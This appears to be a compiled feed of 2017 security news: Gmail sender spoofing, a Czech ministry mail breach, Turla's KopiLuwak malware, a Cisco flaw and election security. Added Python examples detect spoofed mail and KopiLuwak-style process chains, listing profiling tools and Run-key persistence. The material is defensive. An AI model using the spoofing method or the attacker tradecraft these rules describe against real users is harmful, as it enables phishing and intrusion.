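As an added example that is not part of the original article, the Python code below automates the check from this section together with the DMARC rule explained in section 3.2: it parses a message source as shown by “Show original”, compares the Return-Path domain with the “From:” domain, reads the spf/dkim/dmarc verdicts from the Authentication-Results header, and applies a DMARC record’s “p=” tag to decide the disposition. The message source, the Authentication-Results values, the message id and the IP address 203.0.113.26 are all constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message source modelled on Figure 22 ("Show original"): the
# "From:" claims gmail.com, the Return-Path is the experiment domain, and an
# Authentication-Results line of the kind a receiving server adds. All values
# are invented; 203.0.113.26 is a documentation address, not the real server.
SPOOFED_SOURCE = """\
Delivered-To: temporaryrecipient@gmail.com
Return-Path: <email@our-generic-domain.com>
Received: from mail.our-generic-domain.com ([203.0.113.26])
        by mx.google.com with ESMTP id EXAMPLE-ID
Authentication-Results: mx.google.com;
       dkim=none;
       spf=pass (domain designates 203.0.113.26 as permitted sender) smtp.mailfrom=email@our-generic-domain.com;
       dmarc=fail header.from=gmail.com
From: Temporary Sender <temporarysender@gmail.com>
To: temporaryrecipient@gmail.com
Subject: Spoofed sender test

Hello from the experiment.
"""

_AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)
_MAILFROM = re.compile(r"smtp\.mailfrom=([^\s;]+)", re.IGNORECASE)


def domain_of(address: str) -> str:
    """Domain of 'user@domain' (a bare domain is returned unchanged)."""
    return address.rpartition("@")[2].lower()


def authentication_results(msg) -> dict:
    """Map method -> verdict, e.g. {'spf': 'pass', 'dmarc': 'fail'}; first value wins."""
    results = {}
    for value in msg.get_all("Authentication-Results", []):
        for method, result in _AUTH_RESULT.findall(value):
            results.setdefault(method.lower(), result.lower())
    return results


def spoof_indicators(raw_source: str) -> list:
    """Reasons the message source looks forged; an empty list means none found."""
    msg = message_from_string(raw_source)
    from_domain = domain_of(parseaddr(msg.get("From", ""))[1])
    return_path = parseaddr(msg.get("Return-Path", ""))[1]
    auth = authentication_results(msg)
    auth_text = " ".join(msg.get_all("Authentication-Results", []))
    reasons = []
    # Section 4.2: Return-Path (= MAIL FROM) on a domain other than the From domain.
    if return_path and domain_of(return_path) != from_domain:
        reasons.append(f"Return-Path domain {domain_of(return_path)} differs from From domain {from_domain}")
    # Section 3.2.1: SPF passed, but only for the envelope sender's own domain.
    mail_from = _MAILFROM.search(auth_text)
    if auth.get("spf") == "pass" and mail_from and domain_of(mail_from.group(1)) != from_domain:
        reasons.append("spf=pass covers the envelope sender domain only, not the From domain")
    if auth.get("dmarc") == "fail":
        reasons.append("DMARC check failed for the From domain")
    return reasons


def dmarc_disposition(record: str, dmarc_result: str) -> str:
    """What the receiver should do with the message under a DMARC record's 'p=' tag."""
    if dmarc_result == "pass":
        return "deliver"
    tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
    policy = tags.get("p", "none").strip().lower()
    return policy if policy in ("reject", "quarantine") else "deliver"   # p=none: deliver


if __name__ == "__main__":
    for reason in spoof_indicators(SPOOFED_SOURCE):
        print("-", reason)
    verdict = authentication_results(message_from_string(SPOOFED_SOURCE)).get("dmarc", "none")
    for record in ("v=DMARC1; p=none", "v=DMARC1; p=quarantine", "v=DMARC1; p=reject"):
        print(f"{record:24} -> {dmarc_disposition(record, verdict)}")
```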

4.3. Report malicious or spam messages to Gmail

Finally, when you identify malicious or spoofed messages, report them to Gmail. By doing this, you will help Gmail improve its message filters. The report spam/phishing functions are available in the drop-down button near the “reply” button in the Gmail Web application.

5. Final considerations

As we can see, if you have a “self-authorized” e-mail server, i.e. one authorized by your own domain’s SPF policy, you can deliver spoofed messages pretending to be from any existing @gmail.com address to the inbox folder of any other @gmail.com account with no security warning.

As per the results of section 3.3, it was also possible to spoof messages between corporate domains hosted by Google Apps. Beyond the malicious actions that may target a regular Gmail account, this possibility may put entire businesses at risk.

We privately contacted the Google Security team informing them of the possibilities we had found and the potential impact on users. They gave us rapid feedback informing us that our submission would not be tracked as a security bug.

Although it has not been considered a security bug, in our opinion it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account. The alerts used in that case could protect users from a variety of malicious actions. Additionally, we suggest adding the possibility to view message security details within the Gmail iOS app, as today users have no option to verify whether they are being spoofed.

It is worth mentioning that, as per our experiments, Yahoo rejected spoofed messages in both cases. We did not document the Outlook.com tests, but the spoofed messages we tried to send were forwarded to the recipient’s SPAM folder.

As this can be used by cybercriminals or fraudsters to make victims among Gmail users, we decided to publish this article to make people aware of this possibility and help them protect themselves.


We know how the attack on Zaorálek went. The attackers read his e-mails for a whole year
2.2.2017 Živě.cz BigBrother
We have detailed information about the hacker attack on the Ministry of Foreign Affairs
Someone had been reading the ministry’s e-mails for at least a year
Thousands of DOC, PDF and other files also leaked

For the past few days the Czech security scene has been dealing with the intrusion of unknown attackers into the mail system of the Ministry of Foreign Affairs (more information here). Although some politicians reassure the public that no sensitive information was lost, others hold the opposite opinion.

We have at our disposal materials that reveal what actually happened and what the unknown attackers got hold of.

On 19 January 2017 the Ministry of Foreign Affairs informed the National Cyber Security Centre (NCKB) about an attack on the office’s e-mail system and asked it for a quick audit.

Although ordinary e-mail does not meet the criteria of so-called KII (Critical Information Infrastructure), and the ministry itself argues that it does not use e-mail to transfer classified information, so the investigation does not even fall within the competence of the NCKB, security specialists nevertheless set about reading through the portion of the logs they obtained from the office.

Analysts soon discovered with horror that this was not some fleeting intrusion into the mailbox of one of the ministry’s lower officials, but detailed monitoring of 168 mailboxes that began on 8 January 2016 at the latest. The unknown intruder thus had access to the ministry’s mail for more than a year without anyone noticing!

The East was most likely behind the attack

It is precisely the long-term nature of the hackers’ operation and the fact that they were primarily interested in the mailboxes of the top officials, headed by Lubomír Zaorálek, that raises the suspicion that this was a state-sponsored attack, most likely from the East. The hackers connected to the mailboxes from the IP address 78.46.236.7, which hosts a Russian web forum, or from addresses registered as nodes of the Tor anonymity network, through which the Russians probably attacked the e-mails of US Democratic Party representatives last year. A more concrete connection between the two cases, however, is missing.

The Achilles’ heel of the Ministry of Foreign Affairs was one of the administrator mail accounts, admin5. It is not yet certain how the attackers obtained its credentials, but since the NCKB recommended that the ministry introduce two-factor login for key accounts and consider allowing access to important accounts only from intranet IP addresses, it seems that it really was enough to obtain a login and password, for instance just through social engineering, phishing and the like.

Thousands of files, address lists...

In any case, once the attackers penetrated the administrator’s e-mail early last year, they immediately gained access to the entire mail system and, without exaggeration, a real rodeo began.

Over the year they downloaded from the mail server at least 7,119 PDF, DOC and other files, as well as the e-mail addresses of domestic and foreign partners. They obtained fifty documents from the e-mail of Lubomír Zaorálek, and beyond that they showed the greatest interest in the mail of the then deputy ministers Petr Drulák and Jakub Kulhánek, political director Ivo Šrámek, and the internal mail hub ComCen, which functions as a kind of e-mail transshipment point.

A modified Firefox for anonymous browsing on the Tor network. If I enter a web address into the browser, the request for the page is encrypted several times over and travels through three other users, or Tor nodes (in the picture France, Germany, USA), so I am very hard to trace, because on the internet I appear under the IP address of the last link in this chain.

The attackers monitored these mailboxes practically permanently throughout the year and could at any time have abused them for their own phishing, sending all kinds of malware to foreign partners and Czech authorities in the name of one of the state’s senior representatives and attempting a further level of sophisticated social engineering: “Hi Mirek, this is Lubomír. How are you getting on with the negotiations about XXX, please?”

What other files the ministry lost

Koordinace přípravy pozic ČR.doc
szbp_evropska_bezp_strategie_mailing_list.pdf
Zápis ze schůze Výboru pro vnitřní bezpečnost 06_2016.pdf
20161220_02 Příloha 1 Tabulka úkolů z jednání EUMC 20. prosince 2016.doc
2016 30.3-7.4. pracovní cesta_USA7.2..doc
(EUMC – European Union Military Committee)
From the headers of the stolen e-mails the attackers learned about the preparations for various negotiations and gained an idea of the internal workings of the office, its priorities and its decision-making processes. The real problem lies in the duration of the monitoring. Even though the e-mail was not used to exchange truly classified information, thanks to a whole year of monitoring they still collected a pile of sensitive data that they could assemble, like pieces of a mosaic, into a complete picture and thus gain, for example, a strategic advantage in bilateral and multilateral negotiations.

To be more specific, the unknown attackers followed, for instance, the preparation of various documents over time, so they obtained a pile of their versions and had an idea of which direction the negotiations were heading. Had they obtained only one version, they would have lost this context.

Two-factor would have been enough

The saddest thing about the whole affair, however, is the fact that ordinary e-mail from Google (Gmail), Apple or, say, Microsoft (Outlook.com) is far better secured than the e-mail of one of the most important offices in the country. They offer optional two-factor login, where to access the account you need yet another verification, for instance via a mobile app or a code that arrives by SMS.

The principle of two-factor/two-step login. Knowing the e-mail address and password is not enough; in addition you have to enter a code that arrives, for instance, as an SMS, or confirm the login in a mobile app. The attacker would thus have to gain physical access to the phone, which is not so simple.

If the state administration used the current common standard for securing any communication, intelligence officers somewhere, most likely in Russia, would not now be amusing themselves by reading through the ministry’s unimportant correspondence.


Spam has increased significantly. It is at its highest level in the last seven years

2.2.2017 Novinky/Bezpečnost Spam
The share of unsolicited mail in e-mail rose last year to its highest level in the past seven years and made up roughly 65 percent of all messages. Every second, more than 3,500 spam messages are sent worldwide. Roughly eight to ten percent of them contain malicious software. This follows from a study by Cisco.
A new trick of hackers has become the abuse of programs that display unsolicited advertising (adware). These are found on devices at up to 75 percent of companies and organizations and can become the basis for a powerful attack. One example is the DNSChanger malware, which allows an attacker to control network traffic. DNSChanger, however, occurs only on devices that had previously been infected with adware.

Almost a third of successfully attacked organizations recorded lower revenues, and 38 percent of them report a decrease of more than a fifth. About 90 percent of attacked companies subsequently invested in improving their cyber defenses.

Even so, 44 percent of security alerts remain without further investigation. More than a fifth of the organizations that suffered a successful attack lost customers, and 40 percent of those lost more than a fifth of their customer base.

High-risk applications
The number of cloud applications used by employees has increased more than tenfold in two years. More than a quarter of the applications that operate over the internet were assessed as high-risk.

Half of companies use security solutions from more than five vendors, and three percent from more than 50 suppliers. The complexity of the security architecture, however, can paradoxically help attackers, who gain more time and room to launch an attack.

Not all solutions are compatible, and not all devices in the network are protected by all the installed security products. In addition, such a situation makes it harder for organizations to find security experts, since working with many tools significantly raises the demands on their qualifications.

Exploit kits have almost disappeared
The study found that the most widespread tools for distributing malicious software (so-called exploit kits) have almost disappeared. The Angler, Nuclear, Neutrino and RIG exploit kits previously ranked among the most used. In November 2016, however, the only active one was RIG.

The retreat of the Angler exploit kit is related to the arrest of 50 Russian hackers in spring 2016 who used the Lurk malware for attacks on Russian banks. Other forms are taking their place, for example Sundown, Sweet Orange and Magnitude. Like RIG, these exploit kits target vulnerabilities in Microsoft Internet Explorer, Flash and the Silverlight application platform.


Security Intelligence Automation Startup LogicHub Emerges from Stealth

2.2.2017 securityweeks Cyber
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.

LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.

"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."

But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.

"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."

This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.

It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."

In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."

"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."

In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."

Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates the capture of analyst methods, so that different analytical methods from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."

This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.


Critical Cisco Prime Home Flaw Allows Authentication Bypass

2.2.2017 securityweeks Vulnerebility

Cisco has released a software update for its Prime Home remote management and provisioning solution to address a critical authentication bypass vulnerability discovered by the company during internal security testing.

Cisco Prime Home is designed to give Internet service providers (ISPs) visibility into their customers’ home networks, allowing them to easily make configuration changes and software upgrades, and remotely diagnose and troubleshoot problems.

The networking giant discovered that the product’s web-based user interface is affected by a vulnerability that can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.

The flaw, tracked as CVE-2017-3791, is caused by a processing error in the role-based access control (RBAC) of URLs. The security hole can be exploited by sending specially crafted API commands to a particular URL.


The vulnerability affects versions 6.3, 6.4 and 6.5 and it has been addressed with the release of version 6.5.0.1. Workarounds are not available.

Versions 5.2 and earlier are not impacted. However, it’s worth pointing out that, in November 2016, the company informed users about a similar critical authentication bypass vulnerability affecting Cisco Prime versions 5.1.1.6 and earlier and 5.2.2.2 and earlier.

Cisco is only aware of three security holes affecting Cisco Prime Home. The third one, disclosed in September 2016, is a medium severity XML External Entity (XXE) flaw that allows a remote attacker to access information stored on the affected system.

Another critical vulnerability patched recently by Cisco affects the WebEx browser extensions for Chrome, Internet Explorer and Firefox. The vendor released several updates before it managed to create a proper patch.


Rapid7 Adds Hardware Testing Capabilities to Metasploit

2.2.2017 securityweeks IT
Rapid7 has added a hardware bridge to its Metasploit penetration testing framework, making it easier for users to analyze Internet of Things (IoT) devices. The company said this enhancement makes Metasploit the first general purpose pentesting tool.

Metasploit has allowed researchers to conduct security assessments using Ethernet communications, but now they will also be able to link the tool directly to the hardware via raw wireless and direct hardware manipulation.

Up until now, the framework could be used for hardware testing only by creating custom tools for interaction with the targeted product, which Rapid7 says is a time-consuming and resource-intensive process. The new capability allows users to focus on a more important task: developing exploits.

The first release of the hardware bridge focuses on automotive systems, particularly the Controller Area Network (CAN) bus, but the company plans on adding modules for other types of systems in the upcoming period.

According to Rapid7, pentesters can now use Metasploit to analyze industrial control systems (ICS), IoT hardware and software, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.

“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” said Craig Smith, director of transportation research at Rapid7 and developer of the new capability. “We’re working to give security professionals the resources they need to test and ensure the safety of their products -- no matter what side of the virtual divide they’re on.”

Metasploit already has more than 1,600 exploits and 3,300 modules, and new components are being developed regularly with the aid of hundreds of contributors. According to the Metasploit Project, 190 people made contributions to the framework last year.


Russia-Linked "Turla" Group Uses New JavaScript Malware

2.2.2017 securityweeks Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.

Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.

In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.

The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.

The final KopiLuwak payload is hidden under several layers of JavaScript. Once it has established persistence by creating a registry key, the malware executes a series of commands to collect information about the infected system. The harvested data is written to a temporary file, encrypted and held in memory, after which the file is deleted.

KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose addresses are hardcoded into the malware.

The C&C can instruct the malware to sleep, to exit and stop C&C communications until the next reboot, to uninstall itself, or to run arbitrary commands on the infected system through the Run() method of the WScript.Shell object.
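Kaspersky's write-up, as summarised here, does not list the exact commands, but the behaviour described above (an Office document launching a JavaScript host, a Run-key entry pointing at a script, and the script host spawning host-profiling utilities) is what a detection engineer would hunt for. The following Python is an added example, not Kaspersky's or Turla's code: it applies those three rules to constructed Sysmon-style process-creation (Event ID 1) and registry (Event ID 13) events. The field names, the profiling-tool list, the sample paths and the host names are assumptions for illustration, not published indicators.

```python
"""Detection rules for the KopiLuwak-style chain described above.

Input is a list of Sysmon-like events, constructed inline below.
Field names, the profiling-tool list and all paths are assumptions
for this example; none are indicators from the article.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed set of host-profiling tools a victim profiler typically launches.
PROFILING_TOOLS = {"systeminfo.exe", "tasklist.exe", "net.exe", "ipconfig.exe",
                   "netstat.exe", "arp.exe", "gpresult.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
JS_RE = re.compile(r"\.js[e]?\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return (rule, detail) findings for one process-creation event."""
    findings = []
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", f"{parent} -> {image}"))
    if image in SCRIPT_HOSTS and JS_RE.search(cmd):
        findings.append(("script_host_runs_js", cmd))
    if parent in SCRIPT_HOSTS and image in PROFILING_TOOLS:
        findings.append(("script_host_profiles_host", f"{parent} -> {cmd}"))
    return findings


def check_registry(ev):
    """Flag a Run/RunOnce value whose data launches a script host or a .js file."""
    target = ev.get("TargetObject", "")
    details = ev.get("Details", "")
    if RUN_KEY_RE.search(target) and (
            JS_RE.search(details) or re.search(r"[wc]script", details, re.IGNORECASE)):
        return [("js_run_key_persistence", f"{target} = {details}")]
    return []


def analyze(events):
    """Run every rule over the events; return {host: [findings]} for hosts with hits."""
    by_host = {}
    for ev in events:
        if ev["EventID"] == 1:
            found = check_process(ev)
        elif ev["EventID"] == 13:
            found = check_registry(ev)
        else:
            found = []
        if found:
            by_host.setdefault(ev["Computer"], []).extend(found)
    return by_host


def suspicious_hosts(events, min_rules=2):
    """Hosts that trip at least `min_rules` distinct rules; one rule alone is noisy."""
    return sorted(host for host, fs in analyze(events).items()
                  if len({rule for rule, _ in fs}) >= min_rules)


SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    {"EventID": 1, "Computer": "WS01",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\letter.js"'},
    {"EventID": 13, "Computer": "WS01",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r'wscript.exe //B "C:\Users\alice\AppData\Roaming\update.js"'},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\systeminfo.exe", "CommandLine": "systeminfo"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\tasklist.exe", "CommandLine": "tasklist /v"},
    # Benign: a domain logon script run by userinit, no Office parent, no Run key.
    {"EventID": 1, "Computer": "WS02", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe \\dc01\netlogon\logon.vbs"},
]

if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(host, rule, detail)
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

Requiring two distinct rules per host before raising an alert is what keeps the logon script on WS02 out of the queue: a script host on its own is normal on most Windows estates, whereas an Office parent plus a Run-key entry plus profiling utilities is not.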

One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.

For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.

“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”


Gmail Drops Support for Chrome on Windows XP and Vista

2.2.2017 securityweek Hacking
Gmail will soon drop support for Chrome version 53 and below, a move expected to hit Windows XP and Vista users the most, given that Chrome 49 was the last browser iteration released for them.

The change will occur on February 8, 2017, when users accessing their Gmail accounts using Chrome 53 or an older browser iteration will be presented with a banner at the top of the Gmail interface, informing them the application is no longer supported.

The idea behind this move, Google says, is to encourage users to upgrade to newer versions of Chrome, with Chrome 56 being the latest. Made available last week, this browser release brought various important security updates, the Internet giant said.

Windows XP and Windows Vista users who access the Internet via Chrome are expected to be impacted the most, Google admits. Chrome 49, which graduated to the stable channel in March 2016, was the last browser version to offer support for the two operating systems.

Chrome users on these platforms have already missed almost a full year of browser security patches, on top of no longer receiving Microsoft's monthly operating system updates. Security experts have repeatedly warned of the risk that the continued use of Windows XP and Vista poses to enterprises.

In December last year, Mozilla announced plans to kill Firefox for Windows XP and Vista. Microsoft stopped updating Internet Explorer 8 (along with IE 9 and 10) in January 2016, which was yet another hit to Windows XP users, since as many as 88% of them still use this browser version.

According to Google, Gmail users who will continue to access their email accounts using Chrome Browser 53 and below will be exposed to security risks and won’t benefit from new features and bugfixes. While Gmail will continue to work for them throughout the year, they “could be redirected to the basic HTML version of Gmail as early as Dec 2017,” the company says in an announcement.

Users are advised to update their browser as soon as possible so that they keep receiving security fixes. Administrators are likewise encouraged to keep their users on the latest version of Chrome. Some users, however, will need to migrate to a newer operating system before they can install the latest Chrome release.
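An administrator who wants to know how many users will be hit by this change can read the answer out of web server access logs. The following Python is an added example, not Google's code: it parses the user-agent string from constructed combined-format access log lines, flags Chrome major versions 53 and below and any client reporting Windows NT 5.1, 5.2 or 6.0 (XP, XP x64 and Vista), and excludes Edge and Opera, which also carry a "Chrome/" token in their user agent and would otherwise be counted. The log lines and IP addresses are constructed for the example.

```python
"""Find Gmail clients on unsupported Chrome builds or end-of-life Windows.

Cutoffs come from the article: Chrome 53 and below, and Windows XP / Vista,
for which Chrome 49 was the last release. The log lines are constructed.
"""
import re

UNSUPPORTED_MAX_CHROME = 53
# Windows NT versions that identify XP (5.1), XP x64 / Server 2003 (5.2) and Vista (6.0).
EOL_WINDOWS = {"5.1": "Windows XP", "5.2": "Windows XP x64/Server 2003", "6.0": "Windows Vista"}

CHROME_RE = re.compile(r"Chrome/(\d+)\.")
WINNT_RE = re.compile(r"Windows NT (\d+\.\d+)")
# Edge and Opera embed "Chrome/<ver>" too; skip them so they are not misreported.
NOT_CHROME_RE = re.compile(r"(Edge|OPR)/")


def classify_ua(ua):
    """Return version/flag details for a genuine Chrome UA, or None otherwise."""
    if NOT_CHROME_RE.search(ua):
        return None
    m = CHROME_RE.search(ua)
    if not m:
        return None
    major = int(m.group(1))
    nt = WINNT_RE.search(ua)
    nt_ver = nt.group(1) if nt else None
    return {
        "chrome_major": major,
        "windows_nt": nt_ver,
        "unsupported_chrome": major <= UNSUPPORTED_MAX_CHROME,
        "eol_windows": EOL_WINDOWS.get(nt_ver),
    }


def scan_log(lines):
    """Return {client_ip: classification} for every flagged request.

    Assumes Apache/nginx combined log format, where the user agent is the
    last double-quoted field on the line.
    """
    flagged = {}
    for line in lines:
        line = line.rstrip()
        if not line.endswith('"'):
            continue
        ip = line.split(" ", 1)[0]
        ua = line.rsplit('"', 2)[-2]
        info = classify_ua(ua)
        if info and (info["unsupported_chrome"] or info["eol_windows"]):
            flagged[ip] = info
    return flagged


SAMPLE_LOG = [  # constructed access-log lines
    '10.0.0.5 - - [02/Feb/2017:10:01:00 +0000] "GET /mail HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/49.0.2623.112 Safari/537.36"',
    '10.0.0.6 - - [02/Feb/2017:10:01:03 +0000] "GET /mail HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/56.0.2924.76 Safari/537.36"',
    '10.0.0.7 - - [02/Feb/2017:10:01:07 +0000] "GET /mail HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/53.0.2785.143 Safari/537.36"',
    '10.0.0.8 - - [02/Feb/2017:10:01:09 +0000] "GET /mail HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063"',
]

if __name__ == "__main__":
    for ip, info in scan_log(SAMPLE_LOG).items():
        print(ip, info)
```

The two categories deserve different follow-up: a Chrome 53 client on Windows 7 (10.0.0.7) just needs the browser updated, whereas the Chrome 49 client on Windows NT 5.1 (10.0.0.5) cannot be fixed by a browser update at all and needs an operating system migration.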

Google also underlines that, while its “current supported browser policy” notes that only the most recent version of Chrome is supported, it decided to make the announcement regarding the discontinued support for older versions of Chrome because of the expected impact on Windows XP and Windows Vista users.


Dutch Government announced all ballots will be counted by hand amid cyberattack fears
2.2.2017 securityaffairs Cyber

Dutch Government announced that all ballots in the election next month will be counted by hand in order to avoid any interference due to cyber attacks.
The 2016 US presidential election taught the world an important lesson: foreign hackers are a dangerous threat even to democracy itself.

French Defense Minister Le Drian recently expressed concern about cyber attacks against defense systems and warned of hacking campaigns targeting the upcoming elections. European intelligence agencies are warning the Netherlands, France and Germany that their voting systems could be manipulated in the forthcoming elections.

In response to the alarm, all ballots in the Netherlands’ election next month will be counted by hand in order to avoid any interference due to cyber attacks.

“Reports in recent days about vulnerabilities in our systems raise the question of whether the results could be manipulated,” explained Interior Minister Ronald Plasterk in a statement on Wednesday. “No shadow of doubt can be permitted.”


The Minister fears cyber attacks from foreign states, with Russia regarded as one of the most serious threats.

“Now there are indications that Russians could be interested, for the following elections we must fall back on good old pen and paper,” he added.

The Dutch already cast paper ballots, which are tallied by hand locally, but the aggregation of those local totals is done with software that could be targeted by hackers. Dutch media reported that the software used by the government could be compromised by state-sponsored attackers.

“In an earlier report, RTL had said the tallying software was distributed by CD-ROM to regional counting centers where it was installed on old computers that were internet connected – a procedure that experts consulted by the broadcaster considered highly insecure.” reported the Reuters Agency.

“Plasterk told RTL the vote count should not take longer than normal. Election authorities typically publish a preliminary result on the evening after polls close, which is often very close to the final outcome.”

According to intelligence agencies, Russia could attempt to hack voting systems in Europe to destabilize them and favor right-wing movements; the Kremlin, of course, denies any involvement in the recent hacking campaigns against government organizations worldwide.


Hackers Offering Money to Company Insiders in Return for Confidential Data
2.2.2017 thehackernews Hacking
The insider threat is the worst nightmare for a company, as the employees can access company's most sensitive data without having to circumvent security measures designed to keep out external threats.
The rogue employee can collect, leak, or sell all your secrets, including professional, confidential, and upcoming project details, to your rival companies and much more that could result in significant loss to your company.
And this is exactly what is happening on dark web marketplaces, where one can buy and sell everything from illicit drugs to exploits, malware and stolen data.
According to a new report from US-based risk security firm RedOwl and Israeli threat intelligence firm IntSights, corporate staff are selling their employers' internal secrets to hackers for cash on Kick Ass Marketplace, one of the best-known dark web markets.
Besides selling their company's secret information, researchers also found evidence of rogue staff, in some cases, even working with hackers to infect their company networks with malware.
Kick Ass Marketplace charges its clients a subscription of up to one bitcoin (around $950 at the time) a month for access to a stream of "vetted and accurate" insider information posted to the site.
Every post carries a "confidence rating," along with advice on whether to buy or sell stock in the company concerned, so that clients can cash in on the insider information.
